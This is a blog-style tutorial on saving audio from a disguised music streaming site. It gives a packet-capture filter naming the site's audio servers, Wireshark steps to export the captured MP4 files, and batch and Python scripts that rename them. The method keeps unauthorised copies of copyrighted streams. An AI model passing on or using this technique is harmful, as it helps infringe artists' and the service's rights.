server-ph-sv5-43-157.popularmusicsite.com or server-ph-sv5-43-158.popularmusicsite.com or server-ph-sv5-43-159.popularmusicsite.com or 
server-ph-sv5-43-160.popularmusicsite.com or server-ph-sv5-43-161.popularmusicsite.com or server-ph-sv5-43-162.popularmusicsite.com or server-ph-sv5-43-163.popularmusicsite.com or server-ph-sv5-43-164.popularmusicsite.com or server-ph-sv5-43-165.popularmusicsite.com or server-ph-sv5-43-166.popularmusicsite.com or server-ph-sv5-43-167.popularmusicsite.com or server-ph-sv5-43-168.popularmusicsite.com or server-ph-sv5-43-169.popularmusicsite.com or server-ph-sv5-43-170.popularmusicsite.com or server-ph-sv5-43-171.popularmusicsite.com or server-ph-sv5-43-172.popularmusicsite.com or server-ph-sv5-43-173.popularmusicsite.com or server-ph-sv5-43-174.popularmusicsite.com or server-ph-sv5-43-175.popularmusicsite.com or server-ph-sv5-43-176.popularmusicsite.com or server-ph-sv5-43-177.popularmusicsite.com or server-ph-sv5-43-178.popularmusicsite.com or server-ph-sv5-43-179.popularmusicsite.com or server-ph-sv5-43-180.popularmusicsite.com or server-ph-sv5-43-181.popularmusicsite.com or server-ph-sv5-43-182.popularmusicsite.com or server-ph-sv5-43-183.popularmusicsite.com or server-ph-sv5-43-184.popularmusicsite.com or server-ph-sv5-43-185.popularmusicsite.com or server-ph-sv5-43-188.popularmusicsite.com or server-ph-sv5-43-189.popularmusicsite.com or server-ph-sv5-43-190.popularmusicsite.com or server-ph-sv5-43-191.popularmusicsite.com or server-ph-sv5-43-192.popularmusicsite.com or server-ph-sv5-43-193.popularmusicsite.com or server-ph-sv5-43-194.popularmusicsite.com or server-ph-sv5-43-195.popularmusicsite.com or server-ph-sv5-43-196.popularmusicsite.com or server-ph-sv5-43-197.popularmusicsite.com or server-ph-sv5-43-198.popularmusicsite.com or server-ph-sv5-43-200.popularmusicsite.com or server-ph-sv5-43-201.popularmusicsite.com or server-ph-sv5-43-202.popularmusicsite.com or server-ph-sv5-43-203.popularmusicsite.com or server-ph-sv5-43-204.popularmusicsite.com or server-ph-sv5-43-206.popularmusicsite.com or server-ph-sv5-43-207.popularmusicsite.com or 
server-ph-sv5-43-208.popularmusicsite.com or server-ph-sv5-43-209.popularmusicsite.com or server-ph-sv5-43-210.popularmusicsite.com or server-ph-sv5-43-211.popularmusicsite.com or server-ph-sv5-43-212.popularmusicsite.com or server-ph-sv5-43-213.popularmusicsite.com or server-ph-sv5-43-214.popularmusicsite.com or server-ph-sv5-43-215.popularmusicsite.com or server-ph-sv5-43-216.popularmusicsite.com or server-ph-sv5-43-217.popularmusicsite.com or server-ph-sv5-43-218.popularmusicsite.com or server-ph-sv5-43-219.popularmusicsite.com or server-ph-sv5-43-220.popularmusicsite.com or server-ph-sv5-43-221.popularmusicsite.com or server-ph-sv5-43-222.popularmusicsite.com or server-ph-sv5-43-223.popularmusicsite.com or server-ph-sv5-43-224.popularmusicsite.com or server-ph-sv5-43-225.popularmusicsite.com or server-ph-sv5-43-226.popularmusicsite.com or server-ph-sv5-43-227.popularmusicsite.com or server-ph-sv5-43-228.popularmusicsite.com or server-ph-sv5-43-229.popularmusicsite.com or server-ph-sv5-43-230.popularmusicsite.com or server-ph-sv5-43-231.popularmusicsite.com or server-ph-sv5-43-232.popularmusicsite.com or server-ph-sv5-43-233.popularmusicsite.com or server-ph-sv5-43-234.popularmusicsite.com or server-ph-sv5-43-235.popularmusicsite.com or server-ph-sv5-43-236.popularmusicsite.com or server-ph-sv5-43-237.popularmusicsite.com or server-ph-sv5-43-238.popularmusicsite.com or server-ph-sv5-43-239.popularmusicsite.com or server-ph-sv5-43-240.popularmusicsite.com or server-ph-sv5-43-241.popularmusicsite.com or server-ph-sv5-43-242.popularmusicsite.com or server-ph-sv5-43-243.popularmusicsite.com or server-ph-sv5-43-244.popularmusicsite.com or server-ph-sv5-43-245.popularmusicsite.com or server-ph-sv5-43-247.popularmusicsite.com or server-ph-sv5-43-248.popularmusicsite.com or server-ph-sv5-43-249.popularmusicsite.com or server-ph-sv5-43-250.popularmusicsite.com or server-ph-sv5-43-251.popularmusicsite.com or server-ph-sv5-43-252.popularmusicsite.com or 
server-ph-sv5-43-253.popularmusicsite.com or server-ph-sv5-43-254.popularmusicsite.com or future-208-85-44-1.popularmusicsite.com or server-net-sv3-44-7.popularmusicsite.com or server-net-sv3-44-8.popularmusicsite.com or server-net-sv3-44-9.popularmusicsite.com or server-net-sv3-44-10.popularmusicsite.com or mediaserver-ash-t1-1.popularmusicsite.com or mediaserver-ash-t1-2.popularmusicsite.com or mediaserver-ash-t3-2.popularmusicsite.com or mediaserver-ash-t2-1.popularmusicsite.com or mediaserver-ash-t2-2.popularmusicsite.com or mediaserver-ash-t3-3.popularmusicsite.com or mediaserver-ash-t3-4.popularmusicsite.com or mediaserver-ash-t3-5.popularmusicsite.com or mediaserver-ash-t2-3.popularmusicsite.com or server-ph-dc4-44-24.popularmusicsite.com or server-ph-dc4-44-25.popularmusicsite.com or server-ph-dc4-44-26.popularmusicsite.com or server-ph-dc4-44-27.popularmusicsite.com or server-ph-dc4-44-28.popularmusicsite.com or server-ph-dc4-44-29.popularmusicsite.com or server-ph-dc4-44-31.popularmusicsite.com or server-ph-dc4-44-32.popularmusicsite.com or server-ph-dc4-44-33.popularmusicsite.com or server-ph-dc4-44-34.popularmusicsite.com or server-ph-dc4-44-35.popularmusicsite.com or server-ph-dc4-44-36.popularmusicsite.com or server-ph-dc4-44-37.popularmusicsite.com or server-ph-dc4-44-38.popularmusicsite.com or server-ph-dc4-44-39.popularmusicsite.com or server-ph-dc4-44-40.popularmusicsite.com or server-ph-dc4-44-41.popularmusicsite.com or server-ph-dc4-44-42.popularmusicsite.com or server-ph-dc4-44-43.popularmusicsite.com or server-ph-dc4-44-44.popularmusicsite.com or server-ph-dc4-44-45.popularmusicsite.com or server-ph-dc4-44-46.popularmusicsite.com or server-ph-dc4-44-48.popularmusicsite.com or server-ph-dc4-44-49.popularmusicsite.com or server-ph-dc4-44-50.popularmusicsite.com or server-ph-dc4-44-51.popularmusicsite.com or server-ph-dc4-44-52.popularmusicsite.com or server-ph-dc4-44-53.popularmusicsite.com or server-ph-dc4-44-54.popularmusicsite.com or 
server-ph-dc4-44-55.popularmusicsite.com or server-ph-dc4-44-56.popularmusicsite.com or server-ph-dc4-44-57.popularmusicsite.com or server-ph-dc4-44-58.popularmusicsite.com or server-ph-dc4-44-59.popularmusicsite.com or server-ph-dc4-44-60.popularmusicsite.com or server-ph-dc4-44-61.popularmusicsite.com or server-ph-dc4-44-62.popularmusicsite.com or server-ph-dc4-44-63.popularmusicsite.com or server-ph-dc4-44-65.popularmusicsite.com or server-ph-dc4-44-67.popularmusicsite.com or server-ph-dc4-44-68.popularmusicsite.com or server-ph-dc4-44-69.popularmusicsite.com or server-ph-dc4-44-70.popularmusicsite.com or server-ph-dc4-44-71.popularmusicsite.com or server-ph-dc4-44-72.popularmusicsite.com or server-ph-dc4-44-73.popularmusicsite.com or server-ph-dc4-44-74.popularmusicsite.com or server-ph-dc4-44-75.popularmusicsite.com or server-ph-dc4-44-76.popularmusicsite.com or server-ph-dc4-44-77.popularmusicsite.com or server-ph-dc4-44-79.popularmusicsite.com or server-ph-dc4-44-80.popularmusicsite.com or server-ph-dc4-44-81.popularmusicsite.com or server-ph-dc4-44-82.popularmusicsite.com or server-ph-dc4-44-83.popularmusicsite.com or server-ph-dc4-44-84.popularmusicsite.com or server-ph-dc4-44-85.popularmusicsite.com or server-ph-dc4-44-86.popularmusicsite.com or server-ph-dc4-44-87.popularmusicsite.com or server-ph-dc4-44-88.popularmusicsite.com or server-ph-dc4-44-89.popularmusicsite.com or server-ph-dc4-44-90.popularmusicsite.com or server-ph-dc4-44-91.popularmusicsite.com or server-ph-dc4-44-92.popularmusicsite.com or server-ph-dc4-44-93.popularmusicsite.com or server-ph-dc4-44-94.popularmusicsite.com or server-ph-dc4-44-95.popularmusicsite.com or server-ph-dc4-44-96.popularmusicsite.com or server-ph-dc4-44-97.popularmusicsite.com or server-ph-dc4-44-98.popularmusicsite.com or server-ph-dc4-44-99.popularmusicsite.com or server-ph-dc4-44-100.popularmusicsite.com or server-ph-dc4-44-101.popularmusicsite.com or server-ph-dc4-44-102.popularmusicsite.com or 
server-ph-dc4-44-103.popularmusicsite.com or server-ph-dc4-44-104.popularmusicsite.com or server-ph-dc4-44-105.popularmusicsite.com or server-ph-dc4-44-106.popularmusicsite.com or server-ph-dc4-44-107.popularmusicsite.com or server-ph-dc4-44-108.popularmusicsite.com or server-ph-dc4-44-109.popularmusicsite.com or server-ph-dc4-44-110.popularmusicsite.com or server-ph-dc4-44-112.popularmusicsite.com or server-ph-dc4-44-113.popularmusicsite.com or server-ph-dc4-44-114.popularmusicsite.com or server-ph-dc4-44-115.popularmusicsite.com or server-ph-dc4-44-116.popularmusicsite.com or server-ph-dc4-44-117.popularmusicsite.com or server-ph-dc4-44-118.popularmusicsite.com or server-ph-dc4-44-119.popularmusicsite.com or server-ph-dc4-44-120.popularmusicsite.com or server-ph-dc4-44-121.popularmusicsite.com or server-ph-dc4-44-122.popularmusicsite.com or server-ph-dc4-44-123.popularmusicsite.com or server-ph-dc4-44-124.popularmusicsite.com or server-ph-dc4-44-125.popularmusicsite.com or server-ph-dc4-44-126.popularmusicsite.com or server-ph-dc4-44-127.popularmusicsite.com or server-ph-dc4-44-128.popularmusicsite.com or server-ph-dc4-44-130.popularmusicsite.com or server-ph-dc4-44-131.popularmusicsite.com or server-ph-dc4-44-132.popularmusicsite.com or server-ph-dc4-44-133.popularmusicsite.com or server-ph-dc4-44-134.popularmusicsite.com or server-ph-dc4-44-135.popularmusicsite.com or server-ph-dc4-44-136.popularmusicsite.com or server-ph-dc4-44-137.popularmusicsite.com or server-ph-dc4-44-138.popularmusicsite.com or server-ph-dc4-44-139.popularmusicsite.com or server-ph-dc4-44-140.popularmusicsite.com or server-ph-dc4-44-141.popularmusicsite.com or server-ph-dc4-44-142.popularmusicsite.com or server-ph-dc4-44-143.popularmusicsite.com or server-ph-dc4-44-145.popularmusicsite.com or server-ph-dc4-44-146.popularmusicsite.com or server-ph-dc4-44-147.popularmusicsite.com or server-ph-dc4-44-148.popularmusicsite.com or server-ph-dc4-44-149.popularmusicsite.com or 
server-ph-dc4-44-150.popularmusicsite.com or server-ph-dc4-44-151.popularmusicsite.com or server-ph-dc4-44-152.popularmusicsite.com or server-ph-dc4-44-153.popularmusicsite.com or server-ph-dc4-44-154.popularmusicsite.com or server-ph-dc4-44-155.popularmusicsite.com or server-ph-dc4-44-156.popularmusicsite.com or server-ph-dc4-44-157.popularmusicsite.com or server-ph-dc4-44-158.popularmusicsite.com or server-ph-dc4-44-159.popularmusicsite.com or server-ph-dc4-44-160.popularmusicsite.com or server-ph-dc4-44-161.popularmusicsite.com or server-ph-dc4-44-162.popularmusicsite.com or server-ph-dc4-44-163.popularmusicsite.com or server-ph-dc4-44-164.popularmusicsite.com or server-ph-dc4-44-165.popularmusicsite.com or server-ph-dc4-44-166.popularmusicsite.com or server-ph-dc4-44-167.popularmusicsite.com or server-ph-dc4-44-168.popularmusicsite.com or server-ph-dc4-44-169.popularmusicsite.com or server-ph-dc4-44-170.popularmusicsite.com or server-ph-dc4-44-171.popularmusicsite.com or server-ph-dc4-44-172.popularmusicsite.com or server-ph-dc4-44-173.popularmusicsite.com or server-ph-dc4-44-174.popularmusicsite.com or server-ph-dc4-44-176.popularmusicsite.com or server-ph-dc4-44-177.popularmusicsite.com or server-ph-dc4-44-178.popularmusicsite.com or server-ph-dc4-44-179.popularmusicsite.com or server-ph-dc4-44-180.popularmusicsite.com or server-ph-dc4-44-181.popularmusicsite.com or server-ph-dc4-44-182.popularmusicsite.com or server-ph-dc4-44-183.popularmusicsite.com or server-ph-dc4-44-184.popularmusicsite.com or server-ph-dc4-44-185.popularmusicsite.com or server-ph-dc4-44-186.popularmusicsite.com or server-ph-dc4-44-187.popularmusicsite.com or server-ph-dc4-44-189.popularmusicsite.com or server-ph-dc4-44-191.popularmusicsite.com or server-ph-dc4-44-192.popularmusicsite.com or server-ph-dc4-44-193.popularmusicsite.com or server-ph-dc4-44-194.popularmusicsite.com or server-ph-dc4-44-195.popularmusicsite.com or server-ph-dc4-44-196.popularmusicsite.com or 
server-ph-dc4-44-197.popularmusicsite.com or server-ph-dc4-44-198.popularmusicsite.com or server-ph-dc4-44-199.popularmusicsite.com or server-ph-dc4-44-200.popularmusicsite.com or server-ph-dc4-44-201.popularmusicsite.com or server-ph-dc4-44-202.popularmusicsite.com or server-ph-dc4-44-203.popularmusicsite.com or server-ph-dc4-44-204.popularmusicsite.com or server-ph-dc4-44-205.popularmusicsite.com or server-ph-dc4-44-206.popularmusicsite.com or server-ph-dc4-44-207.popularmusicsite.com or server-ph-dc4-44-208.popularmusicsite.com or server-ph-dc4-44-209.popularmusicsite.com or server-ph-dc4-44-211.popularmusicsite.com or server-ph-dc4-44-212.popularmusicsite.com or server-ph-dc4-44-213.popularmusicsite.com or server-ph-dc4-44-214.popularmusicsite.com or server-ph-dc4-44-215.popularmusicsite.com or server-ph-dc4-44-217.popularmusicsite.com or server-ph-dc4-44-218.popularmusicsite.com or server-ph-dc4-44-219.popularmusicsite.com or server-ph-dc4-44-221.popularmusicsite.com or server-ph-dc4-44-222.popularmusicsite.com or server-ph-dc4-44-223.popularmusicsite.com or server-ph-dc4-44-224.popularmusicsite.com or server-ph-dc4-44-225.popularmusicsite.com or server-ph-dc4-44-226.popularmusicsite.com or server-ph-dc4-44-227.popularmusicsite.com or server-ph-dc4-44-228.popularmusicsite.com or server-ph-dc4-44-229.popularmusicsite.com or server-ph-dc4-44-230.popularmusicsite.com or server-ph-dc4-44-231.popularmusicsite.com or server-ph-dc4-44-232.popularmusicsite.com or server-ph-dc4-44-233.popularmusicsite.com or server-ph-dc4-44-234.popularmusicsite.com or server-ph-dc4-44-235.popularmusicsite.com or server-ph-dc4-44-236.popularmusicsite.com or server-ph-dc4-44-237.popularmusicsite.com or server-ph-dc4-44-238.popularmusicsite.com or server-ph-dc4-44-239.popularmusicsite.com or server-ph-dc4-44-240.popularmusicsite.com or server-ph-dc4-44-241.popularmusicsite.com or server-ph-dc4-44-242.popularmusicsite.com or server-ph-dc4-44-243.popularmusicsite.com or 
server-ph-dc4-44-244.popularmusicsite.com or server-ph-dc4-44-245.popularmusicsite.com or server-ph-dc4-44-246.popularmusicsite.com or server-ph-dc4-44-247.popularmusicsite.com or server-ph-dc4-44-248.popularmusicsite.com or server-ph-dc4-44-249.popularmusicsite.com or server-ph-dc4-44-250.popularmusicsite.com or server-ph-dc4-44-251.popularmusicsite.com or server-ph-dc4-44-252.popularmusicsite.com or server-ph-dc4-44-253.popularmusicsite.com or server-ph-dc4-44-254.popularmusicsite.com or future-208-85-45-1.popularmusicsite.com or dc4-208-85-45-33.popularmusicsite.com or dc4-208-85-45-34.popularmusicsite.com or dc6-peer-1-te-0-0.popularmusicsite.com or charter-208-85-45-38.popularmusicsite.com or sv5-peer-1-te-4-1.popularmusicsite.com or charter-208-85-45-42.popularmusicsite.com or server-ph-dc4-45-45.popularmusicsite.com or server-ph-dc4-45-46.popularmusicsite.com or server-ph-dc4-45-48.popularmusicsite.com or server-ph-dc4-45-49.popularmusicsite.com or server-ph-dc4-45-50.popularmusicsite.com or server-ph-dc4-45-51.popularmusicsite.com or server-ph-dc4-45-52.popularmusicsite.com or server-ph-dc4-45-53.popularmusicsite.com or server-ph-dc4-45-54.popularmusicsite.com or server-ph-dc4-45-55.popularmusicsite.com or server-ph-dc4-45-56.popularmusicsite.com or server-ph-dc4-45-57.popularmusicsite.com or server-ph-dc4-45-58.popularmusicsite.com or server-ph-dc4-45-59.popularmusicsite.com or server-ph-dc4-45-60.popularmusicsite.com or server-ph-dc4-45-61.popularmusicsite.com or server-ph-dc4-45-62.popularmusicsite.com or server-ph-dc4-45-63.popularmusicsite.com or server-ph-dc4-45-64.popularmusicsite.com or server-ph-dc4-45-65.popularmusicsite.com or server-ph-dc4-45-66.popularmusicsite.com or server-ph-dc4-45-67.popularmusicsite.com or server-ph-dc4-45-68.popularmusicsite.com or server-ph-dc4-45-69.popularmusicsite.com or server-ph-dc4-45-70.popularmusicsite.com or server-ph-dc4-45-71.popularmusicsite.com or server-ph-dc4-45-72.popularmusicsite.com or 
<br />
<br />
If you take the time, I'm sure you can figure out what popularmusicsite.com is.<br />
<br />
This particular popular music site keeps its audio media servers separate from its ad media servers, so you can target just the audio servers. You could grab everything with a net src filter on the IP block, but that's not what I was trying to accomplish. With this filter, only audio files should be captured.<br />
<br />
So that's pretty much it: just go listen to music for a few hours and keep a copy of everything you listened to.<br />
<br />
Open your pcap file in Wireshark and click File -> Export -> Objects -> HTTP.<br />
You should have nothing but audio/mp4 listed in the content type.<br />
Click Save All and save them to a folder.<br />
You'll then need to rename all the files and add the extension .mp4.<br />
<br />
Renaming all those files by hand is a lot of legwork, since they have a bunch of odd characters in their names. It's a good job for a script...<br />
<br />
Place this script one directory up from the folder that holds your exported music, and change blar to that folder's name.<br />
<br />
-=Script=-<br />
<br />
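@echo off<br />
setlocal EnableDelayedExpansion<br />
rem Write a fresh list of the files in .\blar, overwriting any old list<br />
dir /b /a-d ".\blar" > output.txt<br />
rem "delims=" keeps file names that contain spaces in one piece<br />
for /f "delims=" %%a in (output.txt) do (<br />
set t=!random!<br />
rem If that number is already taken, add a second random number<br />
if exist ".\blar\!t!.mp4" set t=!t!_!random!<br />
ren ".\blar\%%a" "!t!.mp4"<br />
)<br />
del /f /q output.txt<br />
echo Done..<br />
pause<br />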
<br />
<br />
This gives every file a random number as its name and adds the .mp4 extension.<br />
Winamp's autotag does a good job of updating the metadata on the files. I don't know of anything that will change the actual filename based on the metadata. If you do, post a comment.<br />
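<br />
The same rename step as an added Python example (not the author's script): it checks each exported object for the MP4 "ftyp" signature instead of trusting the content type Wireshark listed, and retries on name collisions. The function names, the eight-digit naming scheme and the sample files are assumptions of this example.<br />

```python
import os
import secrets
import tempfile


def is_mp4(path):
    """True if the file starts with an ISO base media 'ftyp' box (MP4/M4A)."""
    with open(path, "rb") as f:
        header = f.read(8)
    # Bytes 0-3 hold the box size, bytes 4-7 the box type.
    return len(header) == 8 and header[4:8] == b"ftyp"


def rename_exports(folder):
    """Rename MP4 files in folder to <random>.mp4; return (renamed, skipped)."""
    renamed, skipped = {}, []
    # listdir() is a snapshot, so files renamed below are not visited again.
    for name in sorted(os.listdir(folder)):
        src = os.path.join(folder, name)
        if not os.path.isfile(src):
            continue
        if not is_mp4(src):
            skipped.append(name)  # not MP4 by content: leave it untouched
            continue
        while True:  # retry until the random name is unused
            new_name = f"{secrets.randbelow(10**8):08d}.mp4"
            dst = os.path.join(folder, new_name)
            if not os.path.exists(dst):
                break
        os.rename(src, dst)
        renamed[name] = new_name
    return renamed, skipped


if __name__ == "__main__":
    # Constructed sample input: one fake MP4 header and one non-audio object.
    folder = tempfile.mkdtemp()
    with open(os.path.join(folder, "access%3ftoken=1"), "wb") as f:
        f.write(b"\x00\x00\x00\x20ftypM4A " + b"\x00" * 24)
    with open(os.path.join(folder, "ad.html"), "wb") as f:
        f.write(b"<html></html>")
    renamed, skipped = rename_exports(folder)
    print("renamed:", renamed)
    print("skipped:", skipped)
```
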
<br />
==Update==<br />
A commenter suggested using MP3Tag; it works perfectly.<br />
<br />
<br />